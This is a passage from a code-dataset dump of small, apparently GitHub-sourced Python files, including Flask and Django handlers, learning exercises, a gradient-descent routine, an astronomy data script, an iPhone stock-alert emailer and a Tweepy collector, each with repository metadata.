flask_jwt_extended import fresh_jwt_required, get_jwt_identity\nfrom flask_restful import Resource\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom db.db import DB\nfrom decorator.catch_exception import catch_exception\nfrom decorator.log_request import log_request\nfrom utils.serializer import Serializer\n\n\nclass GetMyEntityAddresses(MethodResource, Resource):\n\n def __init__(self, db: DB):\n self.db = db\n\n @log_request\n @doc(tags=['private'],\n description='Get the list of addresses of an entity assigned to the user authenticated by the token',\n responses={\n \"200\": {},\n \"422\": {\"description\": \"Object not found or you don't have the required access to it\"},\n })\n @fresh_jwt_required\n @catch_exception\n def get(self, id_):\n\n try:\n self.db.session \\\n .query(self.db.tables[\"UserEntityAssignment\"]) \\\n .with_entities(self.db.tables[\"UserEntityAssignment\"].entity_id) \\\n .filter(self.db.tables[\"UserEntityAssignment\"].user_id == int(get_jwt_identity())) \\\n .filter(self.db.tables[\"UserEntityAssignment\"].entity_id == int(id_)) \\\n .one()\n except NoResultFound:\n return \"\", \"422 Object not found or you don't have the required access to it\"\n\n data = Serializer.serialize(\n self.db.session\n .query(self.db.tables[\"EntityAddress\"])\n .filter(self.db.tables[\"EntityAddress\"].entity_id == int(id_))\n .all(),\n self.db.tables[\"EntityAddress\"]\n )\n\n return data, \"200 \"\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/resource/private/get_my_entity_addresses.py","file_name":"get_my_entity_addresses.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14186883153","text":"import Book;\nimport PythonBook;\n\nbook = Book.Book(price=15, name=\"name\", author=\"zuozhe\");\nbook.price = 20;\n\nbook.setName(\"haah\");\nbook.show();\n\n####继承\n\npythonBook = PythonBook.PythonBook(type=\"ebook\"); # 继承了Book的构造器\npythonBook.setName(\"zhzz\")\npythonBook.showInfo()\npythonBook.doSomething()\n\n\n# 多重继承\nclass A:\n name = \"A\";\n __num = 1;\n\n def show(self):\n print(self.name);\n print(self.__num);\n\n def setNum(self, num):\n self.__num = num;\n\n\nclass B:\n nameb = \"B\";\n __numb = 2;\n\n def show(self):\n print(self.nameb);\n print(self.__numb);\n\n def setName(self, name):\n self.nameb = name;\n\n\nclass C(A, B):\n def showAll(self):\n print(self.name);\n print(self.nameb);\n\n\nC = C();\nC.showAll()\nC.show() # 由于A B都有show()方法,因此该出调用结果是根据继承顺序有关class C(B,A). 所以这一打印的是 A 1\nC.setNum(3)\nC.setName(\"zhu\");\nC.showAll()\n","repo_name":"zzzzzz5530041/python_learning","sub_path":"oop/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25549628671","text":"from math import gcd\r\n\r\ndef mmc(a, b):\r\n return a * b // gcd(a, b)\r\n#def mdc(a, b):\r\n#\treturn gcd(a, b)\r\n\r\nE = [int(x) for x in input(\"Digite duas frações que deseja somar, entre com numerador, seguido de denominador ex{num1 den1 num2 den2}:\\n\").split()]\r\nif E[1] == E[3]:\r\n\tnum = E[0]+E[2]\r\n\tden = E[1]\r\n\tr2 = gcd(num, den)\r\n\tnum /= r2\r\n\tden /= r2\r\nelse:\r\n\tr = mmc(E[1], E[3])\r\n\tE[0] = int((r/E[1])*E[0])\r\n\tE[2] = int((r/E[3])*E[2])\r\n\tnum = E[0]+E[2]\r\n\tden = r\r\n\tr2 = gcd(num, den)\r\n\tnum /= r2\r\n\tden /= r2\r\nprint(f\"A soma das frações é {int(num)}/{int(den)}\")","repo_name":"ismael1914/Testing","sub_path":"Soma de duas frações.py","file_name":"Soma de duas frações.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35420005314","text":"from flask import Blueprint, Flask\nfrom flask_restful import Api\nfrom flask_cors import CORS\n\n\nAPI_VERSION = 1\nAPI_URL_PREFIX = '/api/v%s' % API_VERSION\napi_blueprint = Blueprint('api', __name__)\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\n\napi = Api(\n app=api_blueprint,\n prefix = API_URL_PREFIX,\n catch_all_404s=True\n)\n\napp.config.update(\n CELERY_BROKER_URL='amqp://rabbitmq:rabbitmq@rabbitmq:5672/',\n CELERY_RESULT_BACKEND='amqp://rabbitmq:rabbitmq@rabbitmq:5672/',\n CELERYBEAT_SCHEDULER='app.tasks.sqlalchemy_scheduler:DatabaseScheduler'\n)\n\nfrom app.resources.operations import sample\n\napi.add_resource(sample, '/sample')\napp.register_blueprint(api_blueprint)\napi.init_app(app)","repo_name":"bainadeashish/sample_flask","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4932632172","text":"import matplotlib\nmatplotlib.use('qt4agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\ndef gradient_descent(X, y, theta, cost_function, alpha, iters):\n\n print(\"Running gradient descent with alpha =\", alpha, \"for\", iters, \"iterations.\")\n\n m = X.shape[0]\n cost_history = []\n theta_history = []\n\n for i in range(0, iters):\n #update theta\n theta = theta - ( (alpha/m) * (X.T * ( (X * theta) - y) ) )\n cost = cost_function(X, y, theta)\n\n #check for a janky cost\n if cost_history != [] and cost_history[-1] < cost:\n print(\"WARNING: Cost just increased, aborting gradient descent. Take a look at your learning rate, it may be too high.\")\n print(\"ABORTING!\")\n break\n \n '''\n #Currently not using this, but maybe in the future\n #Check for early convergence\n if cost_history != [] and cost_history[-1] - cost < 0.00001:\n print(\"Change in cost is < 1e-5, declaring convergence.\")\n print(\"Thets is:\")\n print(theta)\n break\n '''\n\n cost_history.append(cost)\n theta_history.append(theta)\n\n else:\n #create plot of cost\n fig = plt.figure()\n #ax = fig.add_subplot(1, 2, 1)\n ax = fig.add_subplot(1, 1, 1)\n x = np.arange(0, len(cost_history))\n y = cost_history\n ax.set_xlabel(\"Iteration\")\n ax.set_ylabel(\"Cost\")\n ax.set_title(\"Iterations vs Cost Function with alpha=\" + str(alpha))\n plt.plot(x, y)\n\n ''' \n #3d plot of cost function, only works with 1 feature.\n ax = fig.add_subplot(1, 2, 2, projection = '3d')\n theta_graph = [ [i[0,0], i[1,0]] for i in theta_history]\n theta_graph = np.matrix(theta_graph)\n X = theta_graph[:,0];\n Y = theta_graph[:,1];\n Z = cost_history\n\n ax.plot(X, Y, Z)\n '''\n\n plt.show()\n\n #Output some info on gradient descent\n print(\"Gradient descent completed all iterations.\")\n print(\"Last 2 costs were:\")\n print(cost_history[-2])\n print(cost_history[-1])\n print(\"Theta is:\")\n print(theta)\n\n print()\n return {\"theta\": theta,\n \"cost_history\": cost_history,\n \"theta_history\": theta_history}\n","repo_name":"colinrdavidson/Machine-Learning-with-Python","sub_path":"regression/gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30888931750","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : func_map.py\n@Time : 2019/10/13 09:39:27\n@Author : Jeffrey Wang\n@Version : 1.0\n@Contact : shwangjj@163.com\n@Desc : map函数用法示例\n\nmap(function, iterable, ...)\niterable中每个元素都应用function\n\n'''\n\nif __name__ == \"__main__\":\n m = map(lambda x: x**2, [1, 2, 3, 4])\n print(list(m))\n","repo_name":"shwdbd/python_codepool","sub_path":"src/main/python/wdbd/codepool/pycore/func_map.py","file_name":"func_map.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17792876659","text":"# File to pre-process the Input image -- read the file & determine count of distinct gray levels in an image\n\nimport cv2\nimport numpy as np\nimport sys\n\n# function to read binary file given as input\ndef ReadBin(filename , height , width):\n try:\n binfile = open ( filename , 'rb' )\n gray = np.fromfile (binfile , dtype=np.ubyte).reshape(height, width)\n return gray\n except cv2.error as e:\n print ( \"cv exception caught: {}\".format ( e ) )\n print ( \"Exiting!!!\" )\n sys.exit ( 1 )\n except ValueError as err:\n print ( \"Value error exception caught: {}\".format ( err ) )\n print ( \"Exiting!!!\" )\n sys.exit ( 1 )\n\n# function to read image\ndef ReadImage(filename , height , width):\n try:\n image = cv2.imread ( filename )\n if filename[-3:] == 'png' or filename[-3:] == 'jpg' or filename[-3:] == 'peg':\n gray = cv2.cvtColor ( image , cv2.COLOR_BGR2GRAY )\n isBin = 0\n elif filename[-3:] == 'bin':\n gray = ReadBin ( filename , height , width )\n isBin = 1\n\n return image, gray, isBin\n except cv2.error as e:\n print(\"cv exception caught: {}\".format(e))\n print(\"Exiting!!!\")\n sys.exit(1)\n except ValueError as err:\n print ( \"Value error exception caught: {}\".format ( err ) )\n print ( \"Exiting!!!\" )\n sys.exit ( 1 )\n\n# function to count how many grayscale levels with corresponding counts.\ndef countDistinctGrayLevelsInImage(arr):\n arr = np.array(arr)\n keys = np.unique(arr)\n\n result = {}\n for key in keys:\n occurrences = np.count_nonzero ( arr == key )\n result[key] = occurrences\n\n return result\n\n","repo_name":"dmalhotra27/imageProcessing","sub_path":"preprocessingImage.py","file_name":"preprocessingImage.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11403109755","text":"import sqlite3\nimport json\nfrom dateutil.parser import parse\nimport datetime\nimport sys\n\n## Taken from stack overflow: https://stackoverflow.com/questions/55898212/user-input-from-numbered-list-and-returns-the-list/55898695\ndef display(li):\n #Iterate through the list using enumerate and print\n for idx, tables in enumerate(li):\n print(\"%s. %s\" % (idx+1, tables))\n\n\n## Modifed from stack overflow: https://stackoverflow.com/questions/55898212/user-input-from-numbered-list-and-returns-the-list/55898695\ndef get_list(li):\n choose = int(input(\"\\nSelect DSO Target:\"))-1\n #If choose is not a valid index in list, print error and return empty string\n if choose < 0 or choose > (len(li)-1):\n print('Invalid DSO selected')\n quit()\n \n #Else return chosen string\n return li[choose]\n\nconn = sqlite3.connect('astro.db')\n# https://www.devdungeon.com/content/python-sqlite3-tutorial\n# Load the contents of a database file on disk to a\n# transient copy in memory without modifying the file\nmemory_db = sqlite3.connect(':memory:')\nconn.backup(memory_db)\nconn.close()\nc = memory_db.cursor()\n# c = conn.cursor()\nc.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='astro';\")\njobs = c.fetchall()\nif len(jobs) <= 0:\n print(\"DB not generated\")\n quit()\n\nprint(\"Available DSO Targets\")\nc.execute(\"SELECT DISTINCT json_extract( data, '$.name' ) as NAME FROM astro WHERE type=?\",(\"dso\",))\nq_names = c.fetchall()\nnames = []\nfor n in q_names:\n names+=[n[0]]\ndisplay(names)\ndso = get_list(names)\n\nprint(f\"Generating CSV of View Data for {dso} will take a few minutes\")\n# print(sys.argv[1])\n\nc.execute(\"SELECT DISTINCT json_extract( data, '$.month' ) as MONTH, json_extract( data, '$.day' ) as DAY, json_extract( data, '$.year' ) as YEAR FROM astro WHERE type=?\",(\"dso\",))\ndates = c.fetchall()\nseeing_list = []\nfor date in dates:\n seeing = {\n \"day\":date[1],\n \"month\": date[0],\n \"year\": date[2],\n }\n c.execute(\"SELECT * FROM astro WHERE astro.type=? AND JSON_EXTRACT(astro.data, '$.day')=? AND JSON_EXTRACT(astro.data, '$.month')=? AND JSON_EXTRACT(astro.data, '$.year')=? AND JSON_EXTRACT(astro.data, '$.name')=?;\",(\"dso\",date[1],date[0],date[2], dso))\n query = c.fetchall()\n if len(query) <= 0:\n continue\n q=query[0]\n data = json.loads(q[2])\n if len(data[\"seen\"])>0:\n # print(q)\n start=None\n end=None\n g_start = None\n g_end = None\n m_time_start = None\n m_time_end = None\n m_frac_max = 0\n sorted(data[\"seen\"], key = lambda i: i['time'])\n for see in data[\"seen\"]:\n if \"sun\" in see.keys():\n if start == None and see[\"sun\"]==\"night\":\n if g_start == None and see[\"alt\"]>30:\n g_start = parse(see[\"time\"])\n start = parse(see[\"time\"])\n elif see[\"sun\"]==\"night\":\n if g_start == None and see[\"alt\"]>30:\n g_start = parse(see[\"time\"])\n elif see[\"alt\"]>30:\n g_end = parse(see[\"time\"])\n end = parse(see[\"time\"])\n c.execute(\"SELECT * FROM astro WHERE astro.type=? AND JSON_EXTRACT(astro.data, '$.time')=?;\",(\"moon\",see[\"time\"]))\n m_query = c.fetchall()\n # print(m_query)\n if len(m_query) > 0:\n m_q = m_query[0]\n m_data = json.loads(m_q[2])\n if m_time_start == None and m_data[\"moonalt\"] > 0:\n m_time_start = parse(m_data[\"time\"])\n if m_frac_max == None:\n m_frac_max = m_data[\"moonfrac\"]\n elif m_frac_max < m_data[\"moonfrac\"]:\n m_frac_max = m_data[\"moonfrac\"]\n elif m_data[\"moonalt\"] > 0:\n m_time_end = parse(m_data[\"time\"])\n if m_frac_max == None:\n m_frac_max = m_data[\"moonfrac\"]\n elif m_frac_max < m_data[\"moonfrac\"]:\n m_frac_max = m_data[\"moonfrac\"]\n if start != None and end != None:\n if g_start != None and g_end != None:\n seeing[\"g_time\"] = g_end-g_start\n else:\n seeing[\"g_time\"] = datetime.timedelta(0, 0, 0)\n seeing[\"v_time\"] = end-start\n else:\n seeing[\"g_time\"] = datetime.timedelta(0, 0, 0)\n seeing[\"v_time\"] = datetime.timedelta(0, 0, 0)\n if m_time_start != None and m_time_end != None:\n seeing[\"m_time\"] = m_time_end - m_time_start\n seeing[\"m_frac\"] = m_frac_max\n else:\n seeing[\"m_time\"] = datetime.timedelta(0, 0, 0)\n seeing[\"m_frac\"] = m_frac_max\n seeing_list+=[seeing]\n\nprint(f\"Writing View Data to {dso}.csv\")\nf = open(dso+\".csv\",\"w+\")\nf.write(\"{}/{}/{}, {}, {}, {}, {}\\n\".format(\n \"month\",\n \"day\",\n \"year\",\n \"Time Visible\",\n \"Time Visible above 30 degrees\",\n \"Time Moon is above horizon\",\n \"Max Visible Moon Fraction\"))\nfor seeing in seeing_list:\n if seeing[\"v_time\"].total_seconds() > 0:\n f.write(\"{}/{}/{}, {}, {}, {}, {}\\n\".format(\n seeing[\"month\"],\n seeing[\"day\"],\n seeing[\"year\"],\n seeing[\"v_time\"],\n seeing[\"g_time\"],\n seeing[\"m_time\"],\n seeing[\"m_frac\"]))\nf.close()\n\n","repo_name":"javawolfpack/Astro-Target","sub_path":"csv_data.py","file_name":"csv_data.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13041973332","text":"import random\nimport string\n\nimport pika\nimport pytest\nimport timeout_decorator\n\n\n@timeout_decorator.timeout(5)\n@pytest.mark.parametrize(\"host,port\", [\n (\"rabbitmqdb\", 5672), # Test direct connection\n (\"linkerdtcp\", 7401) # Test via linkerd-tcp\n])\ndef test_connection(host, port):\n queue = \"\".join(random.choices(string.ascii_lowercase, k=5))\n\n connection = pika.BlockingConnection(pika.ConnectionParameters(host, port))\n channel = connection.channel()\n channel.queue_declare(queue=queue)\n channel.basic_publish(\n exchange=\"\",\n routing_key=\"hello\",\n body=\"Hello World!\"\n )\n connection.close()\n","repo_name":"ajagnanan/servicediscovery","sub_path":"apps/tests/linkerdtcp/test_rabbitmq.py","file_name":"test_rabbitmq.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28665818914","text":"from django.shortcuts import render, redirect\nfrom .forms import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\n@login_required\ndef registrar_recurso(request):\n usuario = request.user\n if usuario.is_staff:\n if request.method == 'POST':\n form = registro_recurso(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Recurso registrado exitosamente')\n return render(request, 'recursos/registro_recurso.html', {'form': registro_recurso()})\n else:\n messages.error(request, 'Por favor corrige los errores')\n return render(request, 'recursos/registro_recurso.html', {'form':form})\n else:\n form = registro_recurso()\n return render(request, 'recursos/registro_recurso.html', {'form':form})\n else:\n messages.error(request, 'No estas autorizado para realizar esta acción')\n return redirect('accounts:home')\n\n# Listar recursos\ndef listar_recursos():\n recursos = Recurso.listar_recursos()\n return recursos\n\ndef consultar_recursos(request):\n return render(request, 'recursos/listar_recursos.html', {'recursos': listar_recursos})\n\n\n#Editar recurso\n@login_required\ndef editar_recurso(request, id_recurso):\n recurso = Recurso.get_recurso(id_recurso)\n usuario = request.user\n if usuario.is_staff:\n if request.method == 'POST':\n form = registro_recurso(request.POST, instance=recurso)\n if form.is_valid():\n form.save()\n messages.success(request, 'Recurso modificado exitosamente')\n return redirect('recursos:consultar_recursos')\n else:\n messages.error(request, 'Por favor corrige los errores')\n return render(request, 'recursos/editar_recurso.html', {'form':form})\n else:\n form = registro_recurso(instance=recurso)\n return render(request, 'recursos/editar_recurso.html', {'form':form})\n else:\n messages.error(request, 'No estas autorizado para realizar esta acción')\n return redirect('accounts:home')\n","repo_name":"luishgranja/reservapp","sub_path":"apps/recursos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1885806266","text":"\nimport os\nimport nibabel as nib\n\nfilenames=[]\nunsupervised_data_dir='/shared/mrfil-data/cddunca2/Task01_BrainTumour/imagesTr'\nfor (dirpath, dirnames, files) in os.walk(unsupervised_data_dir):\n filenames += [os.path.join(dirpath, file) for file in files if '.nii.gz' in file ]\n\nout_dir ='/shared/mrfil-data/cddunca2/Task01_BrainTumour/partitioned-by-mode'\nfor decath_file in filenames:\n patient = decath_file.split('/')[-1].split('.')[0]\n image = nib.load(decath_file)\n image_tns = image.get_fdata()\n orig_header = image.header\n aff = orig_header.get_qform()\n # flair t1 t1ce t2 \n modes = [\"flair.nii.gz\", \"t1.nii.gz\", \"t1ce.nii.gz\", \"t2.nii.gz\"]\n for i, mode in enumerate(modes):\n img_mat = image_tns[:, :, :, i]\n img = nib.Nifti1Image(img_mat, aff, header=orig_header)\n os.makedirs(f'{out_dir}/{patient}', exist_ok=True)\n img.to_filename(os.path.join(out_dir, f'{patient}/{patient}_{mode}'))\n\n\n","repo_name":"ChaseDuncan/brats2020","sub_path":"scripts/decathlon_decompress.py","file_name":"decathlon_decompress.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15089824778","text":"#!/usr/bin/python\n\n'''iPhone Availability Checker\nThis tiny script checks if certain iPhone models are available for pickup in the\nApple stores of your choice (as long as they are in the same country). If the\nmodels of your choice are available the script will send you an email. By\nsetting up a cronjob, you can be immediately alerted once the iPhone is\navailable.\n\nYou will need to customize the script to your needs. I.e. county, iPhone model,\nstore etc.\n'''\n\nimport requests\nimport json\nimport smtplib\n\n#######################\n# Begin customization #\n#######################\n\n# The country of the Apple store you are looking to pickup the phone from.\ncountry = 'UK'\n\n# The IDs of the Apple stores you are looking to pickup the phone from.\n# You can find the ID of the Apple store by viewing the source of the store\n# homepage. In the meta-tag you'll see the ID starting with R.\nstores = ['R245', # Covent Garden\n 'R092', # Regent Street\n 'R369'\n ]\n\n# Finding the ID of the model you are looking for is a bit harder. Apple has\n# different IDs for each model in each country. So doublecheck that you have\n# picked the correct ID.\nmodels = ['MN4P2B/A', # iPhone 7+ Silver 128 GB (UK)\n 'MN5F2LL/A', # iPhone 7+ JetBlack 256 GB (US-AT&T)\n 'MN912VC/A',\n 'MN972VC/A']\n\n# Add here the email addresses that you want to inform about the availablility.\nreceipients = ['some@email.me']\n\n# Your gmail address. The availability notification will be send from this\n# account.\nsender = 'some@gmail.com'\n\n# The password of the gmail account.\nsender_passwd = ''\n\n#####################\n# End customization #\n#####################\ncountry_codes = {'AE': ['AE', 'en_AE'],\n 'AU': ['AU', 'en_AU'],\n 'CA': ['CA', 'en_CA'],\n 'CH': ['CH', 'de_CH'],\n 'CN': ['CN', 'en_CN'],\n 'DE': ['DE', 'de_DE'],\n 'ES': ['ES', 'es_ES'],\n 'FR': ['FR', 'fr_FR'],\n 'IT': ['IT', 'it_IT'],\n 'JP': ['JP', 'jp_JP'],\n 'SE': ['SE', 'se_SE'],\n 'TR': ['TR', 'tr_TR'],\n 'UK': ['GB', 'en_GB'],\n 'US': ['US', 'en_US']}\n\nurl = 'https://reserve.cdn-apple.com/{0}/{1}/reserve/iPhone/availability.json'\n\ndef getCurrentStockData():\n '''Loads Apple's current iPhone stock.\n\n Returns:\n A dict with the choosen stores and with these stores' current stock. For\n example:\n\n {'R245': {}, 'R369': {'MN912VC/A': 'ALL'}, 'R092': {}}\n '''\n response = requests.get(url.format(country_codes[country][0],\n country_codes[country][1]))\n\n stock_unfiltered = response.json()\n stock = {}\n\n # filtering the stock to stores of interest\n for store in stores:\n phones = {}\n if store in stock_unfiltered:\n # and models of interest\n for model in models:\n if model in stock_unfiltered[store]:\n phones[model] = stock_unfiltered[store][model]\n\n stock[store] = phones\n\n print(stock)\n return stock\n\ndef loadPreviousStockData():\n try:\n with open('previous_state.temp') as data_file:\n previous_stock = json.load(data_file)\n except:\n previous_stock = {}\n\n return previous_stock\n\ndef saveCurrentStockData(stock):\n # save results to file\n with open('previous_state.temp', 'w') as data_file:\n json.dump(stock, data_file)\n\ndef checkForNewAvailabilities(stock, previous_stock):\n '''Identifies if new stock has become available.\n\n Takes current and previous stock and returns a dictionary will all newly\n available stock.\n\n Args:\n stock: the current stock of the stores.\n previous_stock: the stock of the previous run.\n\n Returns:\n A dict of newly available stock. Example:\n\n {'R369': {'MN912VC/A': 'ALL'}}\n '''\n available_stock = {}\n\n for store in stock:\n for model in stock[store]:\n # Apple uses different codes for available, e.g. \"ALL\" or \"UNLOCKED\"\n if stock[store][model] != 'NONE':\n print(stock[store][model])\n if store not in previous_stock or model not in previous_stock[store]:\n if store in available_stock:\n available_stock[store].update({model: 'ALL'})\n else:\n available_stock[store] = {model: 'ALL'}\n elif previous_stock[store][model] == 'NONE':\n if store in available_stock:\n available_stock[store].update({model: 'ALL'})\n else:\n available_stock[store] = {model: 'ALL'}\n\n print(available_stock)\n return available_stock\n\ndef sendMail(sender, password, receipients, stock):\n '''Formats and sends the mail when new stock is available.\n\n Args:\n sender: gmail account used to send email.\n password: gmail account's password. Might be a application specific.\n receipients: email addresses of to whom to send the email.\n stock: dict of stores with available iphones.\n '''\n msg = ''\n for store in stock:\n for model in stock[store]:\n msg += '* ' + model + ' in ' + store + '\\r\\n'\n\n msg = 'Hi, new iPhones available' + '\\r\\n' + msg\n\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(sender,password)\n server.sendmail(sender, receipients, msg)\n server.quit()\n\nstock = getCurrentStockData()\np_stock = loadPreviousStockData()\n\nnew_stock = checkForNewAvailabilities(stock, p_stock)\nif len(new_stock) > 0:\n sendMail(sender, sender_passwd, receipients, new_stock)\nsaveCurrentStockData(stock)\n","repo_name":"radikahl/scriptbude","sub_path":"iPhoneAvailability/iphone_stock_checker.py","file_name":"iphone_stock_checker.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20952929857","text":"'''1.\"Faça um Programa que peça as quatro notas de 10 alunos,\ncalcule e armazene numa lista a média de cada aluno, imprima o\nnúmero de alunos com média maior ou igual a 7.0.\n\nmedias_alunos = []\nfor i in range(10): \n notas = [] \n for j in range(4): \n nota = float(input(f\"Digite a nota {j+1} do aluno {i+1}: \"))\n notas.append(nota)\n media = sum(notas) / len(notas)\n medias_alunos.append(media)\nalunos_aprovados = sum(1 for media in medias_alunos if media >= 7.0)\nprint(f\"Número de alunos com média maior ou igual a 7.0: {alunos_aprovados}\")\n\n\n2. Programa nome ao contrário em maiúsculas. Faça um programa\nque permita ao usuário digitar o seu nome e em seguida mostre o\nnome do usuário de trás para frente utilizando somente letras\nmaiúsculas. Dica: lembre−se que ao informar o nome o usuário\npode digitar letras maiúsculas ou minúsculas.\n\nnome = input(\"Digite o seu nome, em maiscúlas ou minúsculas: \")\nnome_invertido = nome.upper()[::-1]\nprint(nome_invertido)\n\n\n3. Escreva um programa em Python que onde todos os valores em\num dicionário são emitidos. Se sim , imprima True. Caso contrário,\nimprima Falso.\n\ndef verifica_valores(animais):\n for valor in animais.values():\n if valor is None or valor == \"\":\n return False\n return True\nexemplo_animais = {\n \"anfibios\": \"sapo\",\n \"aves\": \"calopsita\",\n \"mamiferos\": \"gato\",\n \"repteis\": \"\"\n}\nresultado = verifica_valores(exemplo_animais)\nif resultado:\n print(\"True\")\nelse:\n print(\"False\")\n\ndef verifica_valores(animais):\n for valor in animais.values():\n if valor is None or valor == \"\":\n return False\n return True\nexemplo_animais = {\n \"anfibios\": \"sapo\",\n \"aves\": \"calopsita\",\n \"mamiferos\": \"gato\",\n \"repteis\": \"cobra\"\n}\nresultado = verifica_valores(exemplo_animais)\nif resultado:\n print(\"True\")\nelse:\n print(\"False\")\n\n4. \"Utilizando listas faça um programa que faça 5 perguntas para\numa pessoa sobre um crime. As perguntas são:\n\"\"Telefonou para a vítima?\"\"\n\"\"Esteve no local do crime?\"\"\n\"\"Mora perto da vítima?\"\"\n\"\"Devia para a vítima?\"\"\n\"Já trabalhou com a vítima?\"\"\nO programa deve no final emitir uma classificação sobre a participação\nda pessoa no crime. Se a pessoa responder positivamente a 2 questões\nela deve ser classificada como \"\"Suspeita\"\", entre 3 e 4 como\n\"\"Cúmplice\"\" e 5 como \"\"Assassino\"\". Caso contrário, ele será\nclassificado como \"\"Inocente\"\".\n'''\n\ndef fazer_pergunta(pergunta):\n resposta = input(pergunta).strip().lower() \n return resposta == \"sim\" or resposta == \"s\" \n\nperguntas = [\n \"Telefonou para a vítima? \",\n \"Esteve no local do crime? \",\n \"Mora perto da vítima? \",\n \"Devia para a vítima? \",\n \"Já trabalhou com a vítima? \"\n]\n\nrespostas_positivas = 0\n\nfor pergunta in perguntas:\n if fazer_pergunta(pergunta):\n respostas_positivas += 1\nif respostas_positivas == 2:\n classificacao = \"Suspeita\"\nelif 3 <= respostas_positivas <= 4:\n classificacao = \"Cúmplice\"\nelif respostas_positivas == 5:\n classificacao = \"Assassino\"\nelse:\n classificacao = \"Inocente\"\nprint(f\"Classificação: {classificacao}\")\n","repo_name":"chandrasantos/bootcamp_python_django_womakerscode","sub_path":"3_exercicios_listas_tuplas_dicionarios.py","file_name":"3_exercicios_listas_tuplas_dicionarios.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"465685506","text":"graph={\r\n\r\n 0:[1,2],\r\n 1:[0,3,4],\r\n 2:[1,5],\r\n 3:[1],\r\n 4:[1],\r\n 5:[2]\r\n}\r\n\r\n\r\ndef dfs(current,visited):\r\n\r\n visited.add(current)\r\n \r\n\r\n if current==4:\r\n print(visited,end=\" \")\r\n\r\n for i in graph[current]:\r\n if i not in visited:\r\n dfs(i,visited)\r\n \r\n\r\ndfs(0,set())","repo_name":"yashsankh/Codes","sub_path":"dfs1.py","file_name":"dfs1.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36897407295","text":"num = int(input('Enter a number: '))\nh = i = 1\nwhile i <= num:\n l = []\n while h <= num:\n l.append(h)\n h += 1\n print(l)\n i += 1\n h = i\nwhile i > 0:\n k = []\n while num > 0:\n k.append(num)\n num -= 1\n print(k)\n i -= 1\n num = i","repo_name":"Musnik52/pyCodeBasement","sub_path":"begginer's code/numbpyramid.py","file_name":"numbpyramid.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7417906935","text":"import tweepy\nimport configparser\nimport datetime\nimport pandas as pd\nimport pytz\nimport time \nimport csv\nimport pandas as pd\n#check\n\nfrom config import Config\nfrom db_adapter import DbAdapter\nfrom os.path import abspath, dirname, join\nfrom tweets import Tweets\n\nutc=pytz.UTC\n\nCONFIGDIR = join(abspath(dirname(__file__)), 'config')\n\nproject_name = \"Twitter\"\n\nDB_CONFIG_FILE = join(CONFIGDIR, 'config.cfg')\nconfig = Config('config', CONFIGDIR)\ndba = DbAdapter(config.get_property(\"POSTGRES\", \"dialect\"),\n config.get_property(\"POSTGRES\", \"driver\"),\n config.get_property(\"POSTGRES\", \"host\"),\n config.get_property(\"POSTGRES\", \"database\"),\n config.get_property(\"POSTGRES\", \"username\"),\n config.get_property(\"POSTGRES\", \"password\"))\n\n# read configs\n\n\n# cached = Tweets().get_cached_data_by_project(dba, \"Twitter\")\n# cached.extend(Tweets().get_cached_data_by_project(dba, \"Twitter\"))\n\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\napi_key = config['twitter']['api_key']\napi_key_secret = config['twitter']['api_key_secret']\n\naccess_token = config['twitter']['access_token']\naccess_token_secret = config['twitter']['access_token_secret']\n\n# authentication\nauth = tweepy.OAuthHandler(api_key, api_key_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\n# user tweets\ndf = pd.read_csv(\"combined.csv\")\ndf.columns\n\nstartDate = datetime.datetime(2022, 1, 1, 0, 0, 0)\nendDate = datetime.datetime(2023, 1, 1, 0, 0, 